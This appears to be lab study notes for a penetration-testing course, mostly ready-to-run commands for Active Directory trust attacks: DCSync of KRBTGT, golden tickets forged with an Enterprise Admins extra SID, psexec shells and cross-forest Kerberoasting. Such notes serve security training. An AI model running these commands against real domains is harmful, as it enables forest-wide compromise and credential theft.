Domain Trust Enumeration
Enumerate Domain Trusts (PowerView)
Show Existing Trusts
Get-DomaintrustShow Trust Mapping
Get-DomainTrustMappingShow Users in the Child Domain
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountNameAttacking Domain Trusts - Child -> Parent (Windows)
To perform this attack after compromising a child domain, we need the following:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain.
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz.
1 Obtaining KRBTGT NT Hash
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt2 Obtaining SID Child Domain
Get-DomainSID3 Name Target User
# Can be a fake usernamr4 FQDN Child Domain
Get-Domaintrust5 SID Enterprise Admins Group
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid6 Putting It All Together
# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Rubeus Way
\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt7 Confirm Ticket
# List Tickets
klist8 DCsync
# Mimikatz
lsadump::dcsyncAttacking Domain Trusts - Child -> Parent (Linux)
We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain
1 Get KRBTGT NT Hash
secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt2 Get SID Child Domain
lookupsid.py logistics.inlanefreight.local/[email protected] | grep "Domain SID"3 Name Target User
Can be any name4 Get SID Enterprise Admins
lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"5 Putting it all Together
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker6 Export ccache
export KRB5CCNAME=hacker.ccache 7 Get Shell
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass -target-ip 172.16.5.5Automatic Way
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_admAttacking Domain Trust - Cross-Forest (Windows)
Cross-Forest Kerberoasting
# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrapAdmin Password Reuse & Group Membership
# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
# Convert SID
Convert-SidToName <SID>
# Login, if we are part of the administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administratorSID History Abuse
![[Pasted image 20230428181936.png]]
Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)
Cross-Forest Kerberosting
# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wleyLast updated